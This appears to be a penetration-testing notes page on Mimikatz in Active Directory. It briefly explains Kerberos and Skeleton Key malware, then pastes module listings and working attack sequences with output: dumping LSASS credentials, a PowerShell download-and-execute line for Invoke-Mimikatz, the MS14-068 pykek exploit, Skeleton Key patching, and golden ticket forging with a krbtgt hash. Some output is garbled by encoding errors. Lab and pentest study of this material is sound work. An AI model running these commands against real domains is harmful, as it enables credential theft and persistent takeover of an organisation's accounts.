Pentest - Mimikatz


Active Directory supports two primary authentication protoc
ols, NTLM and Kerberos. Modern Windows versions default to Kerberos authentication.

NTLM suffers from two main weaknesses:

  • 1) the NTLM password hash only changes when the password changes, so exposure of this hash provides access to the account until the password is changed, and
  • 2) the server hosting the resource needs to check with
    the Domain Controller to verify the challenge response data sent from the client is valid.

Kerberos improves on these issues by

  • 1) limiting the Kerberos ticket lifetime so if the ticket is stolen, can only be used for a set amount of time,
  • 2) the authentication flow involves the user getting a service ticket (from a DC) for the service on a server which the server checks without requiring communication
    with a DC.

Kerberos Communication

Here’s a quick example describing how Kerberos works:
User logs on with username & password.

1a. Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC as 
an authenticator in the authentication ticket (TGT) request (AS-REQ).

1b. The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket -Granting Ticket (TGT).
2. The TGT is encrypted, signed, & delivered to the user (AS-REP).Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.
3. The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum –If the DC can open the ticket & the checksum check out, TGT = valid. The data in the TGT is effectively copied to create the TGS ticket.
4. The TGS is encrypted using 
the target service accounts’ NTLM password hash and sent to the user (TGS-REP).
5.The user connects to the server hosting the service on the appropriate port & presents the TGS (AP-REQ). The service opens the TGS ticket using its NTLM password hash.
6. If mutual authentication is required by the client (think MS15-011: the Group Policy patch from February that added UNC hardening).
Unless PAC validation is required (rare), the service accepts all data in the TGS ticket with no communication to the DC.

Pentest - Mimikatz_第1张图片

The Skeleton Key malware is installed on one or multiple Domain Controllers running a supported 64bit OS.
The malware “patches” the security system enabling a new master password to be accepted for any domain user, including admins.

This enables the attacker to logon as any user they want with the master password (skeleton key) configured in the malware.

“Joe User” logs in using his usual password with no changes to his account. The attacker can log in as Joe using the skeleton key password and it is seen as a valid logon…

Key points

  • Requires domain-level admin rights (and debug rights which admins have by default) to “patch” LSASS on a Domain Controller.
  • All existing user account passwords continue working as normal.
  • Adds a new password that enables the attacker to log on as any user with this password – this is the “skeleton key”.
  • Active Directory Domain Controllers may experience replication issues.
  • User accounts that require a smart card for authentication are not affected.
  • The Skeleton Key malware currently doesn’t remain active after a reboot – rebooting the DCs removes the in-memory patch. Note that DCs are typically only rebooted about once a month.
  • The Skeleton Key malware only works on the following 64-bit systems: Windows Server 2008, Windows Server 2008 R2, and Windows Server 2003 R2.
  • Mimikatz now has skeleton key functionality and seems to work on all versions of Windows Server…
  • Protect your Active Directory admin accounts and don’t let untrusted code run on Domain Controllers.

Mimikatz Functions

mimikatz # base64::
ERROR mimikatz_doLocal ; "base64" module not found !

        standard  -  Standard module  [Basic commands (does not require module name)]
          crypto  -  Crypto Module
        sekurlsa  -  SekurLSA module  [Some commands to enumerate credentials...]
        kerberos  -  Kerberos package module  []
       privilege  -  Privilege module
         process  -  Process module
         service  -  Service module
         lsadump  -  LsaDump module
              ts  -  Terminal Server module
           event  -  Event module
            misc  -  Miscellaneous module
           token  -  Token manipulation module
           vault  -  Windows Vault/Credential module
     minesweeper  -  MineSweeper module
             net  -  
           dpapi  -  DPAPI Module (by API or RAW access)  [Data Protection application programming interface]


mimikatz # standard::
ERROR mimikatz_doLocal ; "(null)" command of "standard" module not found !

Module :    standard
Full name : Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file output/base64 output
         version  -  Display some version informations
              cd  -  Change or display current directory
        markruss  -  Mark about PtH
meterpreter > mimikatz_command -f standard::
Module : 'standard' introuvable

Modules disponibles : 
                - Standard
      crypto    - Cryptographie et certificats
        hash    - Hash
      system    - Gestion syst�me
     process    - Manipulation des processus
      thread    - Manipulation des threads
     service    - Manipulation des services
   privilege    - Manipulation des privil�ges
      handle    - Manipulation des handles
 impersonate    - Manipulation tokens d'acc�s
     winmine    - Manipulation du d�mineur
 minesweeper    - Manipulation du d�mineur 7
       nogpo    - Anti-gpo et patchs divers
     samdump    - Dump de SAM
      inject    - Injecteur de librairies
          ts    - Terminal Server
      divers    - Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
    sekurlsa    - Dump des sessions courantes par providers LSASS
         efs    - Manipulations EFS


mimikatz # crypto::
ERROR mimikatz_doLocal ; "(null)" command of "crypto" module not found !

Module :    crypto
Full name : Crypto Module

       providers  -  List cryptographic providers
          stores  -  List cryptographic stores
    certificates  -  List (or export) certificates
            keys  -  List (or export) keys containers
            hash  -  Hash a password with optional username
            capi  -  [experimental] Patch CryptoAPI layer for easy export
             cng  -  [experimental] Patch CNG service for easy export
meterpreter > mimikatz_command -f crypto::
Module : 'crypto' identifi�, mais commande '' introuvable

Description du module : Cryptographie et certificats
listProviders   - Liste les providers install�s)
  listStores    - Liste les magasins syst�me
listCertificates    - Liste les certificats
    listKeys    - Liste les conteneurs de cl�s
exportCertificates  - Exporte les certificats
  exportKeys    - Exporte les cl�s
    patchcng    - [experimental] Patch le gestionnaire de cl�s pour l'export de cl�s non exportable
   patchcapi    - [experimental] Patch la CryptoAPI courante pour l'export de cl�s non exportable


mimikatz # sekurlsa::
ERROR mimikatz_doLocal ; "(null)" command of "sekurlsa" module not found !

Module :    sekurlsa
Full name : SekurLSA module
Description :   Some commands to enumerate credentials...

             msv  -  Lists LM & NTLM credentials
         wdigest  -  Lists WDigest credentials
        kerberos  -  Lists Kerberos credentials
           tspkg  -  Lists TsPkg credentials
         livessp  -  Lists LiveSSP credentials
             ssp  -  Lists SSP credentials
  logonPasswords  -  Lists all available providers credentials
         process  -  Switch (or reinit) to LSASS process  context
        minidump  -  Switch (or reinit) to LSASS minidump context
             pth  -  Pass-the-hash
          krbtgt  -  krbtgt!
     dpapisystem  -  DPAPI_SYSTEM secret
           trust  -  Antisocial
      backupkeys  -  Preferred Backup Master keys
         tickets  -  List Kerberos tickets
           ekeys  -  List Kerberos Encryption Keys
           dpapi  -  List Cached MasterKeys
         credman  -  List Credentials Manager
meterpreter > mimikatz_command -f sekurlsa::
Module : 'sekurlsa' identifi�, mais commande '' introuvable

Description du module : Dump des sessions courantes par providers LSASS
         msv    - �num�re les sessions courantes du provider MSV1_0
     wdigest    - �num�re les sessions courantes du provider WDigest
    kerberos    - �num�re les sessions courantes du provider Kerberos
       tspkg    - �num�re les sessions courantes du provider TsPkg
     livessp    - �num�re les sessions courantes du provider LiveSSP
         ssp    - �num�re les sessions courantes du provider SSP (msv1_0)
logonPasswords  - �num�re les sessions courantes des providers disponibles
searchPasswords - rechere directement dans les segments m�moire de LSASS des mots de passes


meterpreter > mimikatz_command -f system::
Module : 'system' identifi�, mais commande '' introuvable

Description du module : Gestion syst�me
        user    - Affiche l'utilisateur courant
    computer    - Affiche le nom d'ordinateur courant


mimikatz # kerberos::
ERROR mimikatz_doLocal ; "(null)" command of "kerberos" module not found !

Module :    kerberos
Full name : Kerberos package module
Description :   

             ptt  -  Pass-the-ticket [NT 6]
            list  -  List ticket(s)
             tgt  -  Retrieve current TGT
           purge  -  Purge ticket(s)
          golden  -  Willy Wonka factory
            hash  -  Hash password to keys
             ptc  -  Pass-the-ccache [NT6]
           clist  -  List tickets in MIT/Heimdall ccache


mimikatz # privilege::
ERROR mimikatz_doLocal ; "(null)" command of "privilege" module not found !

Module :    privilege
Full name : Privilege module

           debug  -  Ask debug privilege
meterpreter > mimikatz_command -f privilege::
Module : 'privilege' identifi�, mais commande '' introuvable

Description du module : Manipulation des privil�ges
        list    - Liste les privil�ges
      enable    - Active un ou plusieurs privil�ges
      remove    - Retire un ou plusieurs privil�ges
     disable    - D�sactive un ou plusieurs privil�ges
       debug    - Demande (ou dsactive) le privil�ge Debug
    security    - Demande (ou dsactive) le privil�ge Security
         tcb    - Demande (ou dsactive) le privil�ge Tcb
 impersonate    - Demande (ou dsactive) le privil�ge Impersonate
      assign    - Demande (ou dsactive) le privil�ge AssignPrimaryToken
    shutdown    - Demande (ou dsactive) le privil�ge Shutdown
   takeowner    - Demande (ou dsactive) le privil�ge TakeOwnership


mimikatz # process::
ERROR mimikatz_doLocal ; "(null)" command of "process" module not found !

Module :    process
Full name : Process module

            list  -  List process
         exports  -  List exports
         imports  -  List imports
           start  -  Start a process
            stop  -  Terminate a process
         suspend  -  Suspend a process
          resume  -  Resume a process

mimikatz # process::list
0   (null)
4   System
352 smss.exe
416 csrss.exe
456 csrss.exe
464 wininit.exe
492 winlogon.exe
540 services.exe
552 lsass.exe
560 lsm.exe
792 svchost.exe
860 svchost.exe
936 svchost.exe
976 svchost.exe
996 svchost.exe
1012    SLsvc.exe
272 svchost.exe
392 svchost.exe
344 svchost.exe
1112    svchost.exe
1340    taskeng.exe
1444    spoolsv.exe
1488    dfsrs.exe
1512    dns.exe
1540    ismserv.exe
1576    ntfrs.exe
1704    svchost.exe
1720    svchost.exe
1772    svchost.exe
1828    dfssvc.exe
1664    taskeng.exe
2060    dwm.exe
2112    explorer.exe
2640    mmc.exe
2700    cmd.exe
2956    msdtc.exe
2392    cmd.exe
2404    rundll32.exe
1364    svchost.exe
2344    cmd.exe
2896    cmd.exe
1996    regedit.exe
260 mimikatz.exe
2472    TrustedInstaller.exe
meterpreter > mimikatz_command -f process::
Module : 'process' identifi�, mais commande '' introuvable

Description du module : Manipulation des processus
        list    - Liste les processus
       start    - Ex�cute un processus, /paused et/ou /sudo
     suspend    - Suspend l'ex�cution d'un processus
      resume    - Reprend un processus
        stop    - Stoppe un (ou plusieurs) processus
     modules    - Liste les modules (pour le moment du PID courant)
         iat    - Liste la table d'adressage


meterpreter > mimikatz_command -f thread::
Module : 'thread' identifi�, mais commande '' introuvable

Description du module : Manipulation des threads
        list    - Liste les threads
     suspend    - Suspend un thread actif
      resume    - Reprend un thread suspendu
        stop    - Arr�te un thread
        quit    - Envoi un message de fermeture � un thread


mimikatz # service::
ERROR mimikatz_doLocal ; "(null)" command of "service" module not found !

Module :    service
Full name : Service module

           start  -  Start service
          remove  -  Remove service
            stop  -  Stop service
         suspend  -  Suspend service
          resume  -  Resume service
     preshutdown  -  Preshutdown service
        shutdown  -  Shutdown service
            list  -  List services
meterpreter > mimikatz_command -f service::
Module : 'service' identifi�, mais commande '' introuvable

Description du module : Manipulation des services
        list    - Liste les services et pilotes
       start    - D�marre un service ou pilote
        stop    - Arr�te un service ou pilote
      remove    - Supprime un service ou pilote
    mimikatz    - Installe et/ou d�marre le pilote mimikatz


meterpreter > mimikatz_command -f handle::
Module : 'handle' identifi�, mais commande '' introuvable

Description du module : Manipulation des handles
        list    - Affiche les handles du syst�me (pour le moment juste les processus et tokens)
 processStop    - Essaye de stopper un ou plusieurs processus en utilisant d'autres handles
tokenImpersonate    - Essaye d'impersonaliser un token en utilisant d'autres handles
     nullAcl    - Positionne une ACL null sur des Handles


mimikatz # ts::
ERROR mimikatz_doLocal ; "(null)" command of "ts" module not found !

Module :    ts
Full name : Terminal Server module

        multirdp  -  [experimental] patch Terminal Server service to allow multiples users

mimikatz # ts::multirdp
"TermService" service patched
meterpreter > mimikatz_command -f ts::
Module : 'ts' identifi�, mais commande '' introuvable

Description du module : Terminal Server
    sessions    - 
   processes    - 
    multirdp    - Patch le bureau � distance pour d�passer 2 connexions simultan�es
  viewshadow    - Affiche l'�tat de la prise de contr�le des sessions RDP
modifyshadow    - Modifie l'�tat de la prise de contr�le des sessions RDP (DISABLE, INTERACT, INTERACT_NOASK, VIEW, VIEW_NOASK)


mimikatz # event::
ERROR mimikatz_doLocal ; "(null)" command of "event" module not found !

Module :    event
Full name : Event module

            drop  -  [experimental] patch Events service to avoid new events
           clear  -  Clear an event log


mimikatz # misc::
ERROR mimikatz_doLocal ; "(null)" command of "misc" module not found !

Module :    misc
Full name : Miscellaneous module

             cmd  -  Command Prompt          (without DisableCMD)
         regedit  -  Registry Editor         (without DisableRegistryTools)
         taskmgr  -  Task Manager            (without DisableTaskMgr)
      ncroutemon  -  Juniper Network Connect (without route monitoring)
         detours  -  [experimental] Try to enumerate all modules with Detours-like hooks


mimikatz # token::
ERROR mimikatz_doLocal ; "(null)" command of "token" module not found !

Module :    token
Full name : Token manipulation module

          whoami  -  Display current identity
            list  -  List all tokens of the system
         elevate  -  Impersonate a token
          revert  -  Revert to proces token


mimikatz # vault::
ERROR mimikatz_doLocal ; "(null)" command of "vault" module not found !

Module :    vault
Full name : Windows Vault/Credential module

            list  -  list
            cred  -  cred


mimikatz # minesweeper::
ERROR mimikatz_doLocal ; "(null)" command of "minesweeper" module not found !

Module :    minesweeper
Full name : MineSweeper module

           infos  -  infos
meterpreter > mimikatz_command -f minesweeper::
Module : 'minesweeper' identifi�, mais commande '' introuvable

Description du module : Manipulation du dmineur 7
       infos    - Obtient des informations sur le d�mineur en cours


mimikatz # net::
ERROR mimikatz_doLocal ; "(null)" command of "net" module not found !

Module :    net
Full name : 

            user  -  
      localgroup  -  
           group  -  

mimikatz # net::user

Domain name : Builtin
Domain SID  : S-1-5-32

Domain name : PENTEST
Domain SID  : S-1-5-21-495298362-4107897003-3932503283
 500   Administrator
 | 512   Domain Admins
 | 520   Group Policy Creator Owners
 | 519   Enterprise Admins
 | 518   Schema Admins
 | 513   Domain Users
 |´544   Administrators
 501   Guest
 | 514   Domain Guests
 |´546   Guests
 502   krbtgt
 | 513   Domain Users
 |`572   Denied RODC Password Replication Group
 1103  debug
 | 513   Domain Users
 | 516   Domain Controllers
 1104  SECLAB$
 | 515   Domain Computers


mimikatz # dpapi::
ERROR mimikatz_doLocal ; "(null)" command of "dpapi" module not found !

Module :    dpapi
Full name : DPAPI Module (by API or RAW access)
Description :   Data Protection application programming interface

            blob  -  Describe a DPAPI blob, unprotect it with API or Masterkey
         protect  -  Protect a data via a DPAPI call
       masterkey  -  Describe a Masterkey file, unprotect each Masterkey (key depending)
        credhist  -  Describe a Credhist file
            capi  -  CAPI key test
             cng  -  CNG key test
            cred  -  CRED test
           vault  -  VAULT test

Dump Passwords


mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords
mimikatz # exit


C:\Users\Administrator\Desktop\Procdump>Procdump.exe -accepteula -ma lsass.exe lsass.dmp    
Procdump.exe -accepteula -ma lsass.exe lsass.dmp

ProcDump v7.1 - Writes process dump files
Copyright (C) 2009-2014 Mark Russinovich
Sysinternals -
With contributions from Andrew Richards

[05:53:51] Dump 1 initiated: C:\Users\Administrator\Desktop\Procdump\lsass.dmp
[05:53:55] Dump 1 writing: Estimated dump file size is 83 MB.
[05:53:58] Dump 1 complete: 84 MB written in 7.0 seconds
[05:53:59] Dump count reached.
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords


powershell IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz

Privilege Esclation - MS14-068


C:\Users\Administrator\Desktop\pykek-master>C:\Python27\python.exe -u [email protected] -s S-1-5-21-30580861-1793299886-3410204933-1008 -d DC.PENTEST.COM
  [+] Building AS-REQ for DC.PENTEST.COM... Done !
  [+] Sending AS-REQ to DC.PENTEST.COM... Done!
  [+] Receiving AS-REP from DC.PENTEST.COM... Done!
  [+] Parsing AS-REP from DC.PENTEST.COM... Done!
  [+] Building TGS-REQ for DC.PENTEST.COM... Done!
  [+] Sending TGS-REQ to DC.PENTEST.COM... Done!
  [+] Receiving TGS-REP from DC.PENTEST.COM... Done!
  [+] Parsing TGS-REP from DC.PENTEST.COM... Done!
  [+] Creating ccache file '[email protected]'... Done!

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48)
 .## ^ ##.  
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'             (oe.eo)
  '#####'                                     with 16 modules * * */

mimikatz # kerberos::ptc [email protected]

Principal : (01) : MASTER ; @ PENTEST.COM

Data 0
       Start/End/MaxRenew: 2015/9/8 22:55:52 ; 2015/9/9 8:55:52 ; 2015/9/15 22:55:52
       Service Name (01) : krbtgt ; PENTEST.COM ; @ PENTEST.COM
       Target Name  (01) : krbtgt ; PENTEST.COM ; @ PENTEST.COM
       Client Name  (01) : MASTER ; @ PENTEST.COM
       Flags 50a00000    : pre_authent ; renewable ; proxiable ; forwardable ; 
       Session Key       : 0x00000017 - rc4_hmac_nt      
       Ticket            : 0x00000000 - null              ; kvno = 2    [...]
       * Injecting ticket : OK

mimikatz # exit


��ǰ��¼ ID �� 0:0x3e7

������Ʊ֤: (1)

    ������: krbtgt/PENTEST.COM @ PENTEST.COM
    Kerberos Ʊ֤��������: RSADSI RC4-HMAC(NT)
    Ʊ֤��־ 0x50a00000 -> forwardable proxiable renewable pre_authent 
    ��ʼʱ��: 9/8/2015 22:55:52 (����)
    ����ʱ��:   9/9/2015 8:55:52 (����)
    ����ʱ��: 9/15/2015 22:55:52 (����)
    �Ự��Կ����: RSADSI RC4-HMAC(NT)

C:\Users\Administrator\Desktop\mimikatz_trunk\x64>net use \\DC.PENTEST.COM\ipc$
net use \\DC.PENTEST.COM\ipc$

C:\Users\Administrator\Desktop\mimikatz_trunk\x64>dir \\DC.PENTEST.COM\c$\ 
dir \\DC.PENTEST.COM\c$\
 ������ \\DC.PENTEST.COM\c$ �еľ�û�б�ǩ��
 ��������� 403D-792F


2015/08/19  10:25              inetpub
2009/07/14  11:20              PerfLogs
2015/08/13  14:58              Program Files
2015/08/13  14:58              Program Files (x86)
2015/09/08  09:20              Users
2015/08/24  16:56              Windows
               0 ���ļ�              0 �ֽ
               6 ��Ŀ¼ 25,048,915,968 �����ֽ

Administrator            ctfcx                    




  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Sep  6 2015 19:02:05)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'             (oe.eo)
  '#####'                                     with 16 modules * * */

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK


mimikatz # kerberos::golden /user:Administrator /domain:PENTEST.COM /sid:S-1-5-21-495298362-4107897003-3932503283 /krbtgt:2ba4387de08ea1e1ee36d2a18c54b40c /ticket:pwnKRBTGT.bin
User      : Administrator
Domain    : PENTEST.COM
SID       : S-1-5-21-495298362-4107897003-3932503283
User Id   : 500
Groups Id : *513 512 520 518 519 
ServiceKey: 2ba4387de08ea1e1ee36d2a18c54b40c - rc4_hmac_nt      
Lifetime  : 4/11/2015 6:05:05 AM ; 4/8/2025 6:05:05 AM ; 4/8/2025 6:05:05 AM
-> Ticket : pwnKRBTGT.bin

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !
mimikatz # kerberos::ptt pwnKRBTGT.bin
mimikatz # exit
C:\Users\Administrator\Desktop\mimikatz_trunk\x64>net use k: \\PENTEST.COM\c$


  1. Active Directory Domain Controller Skeleton Key Malware & Mimikatz
  2. Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest
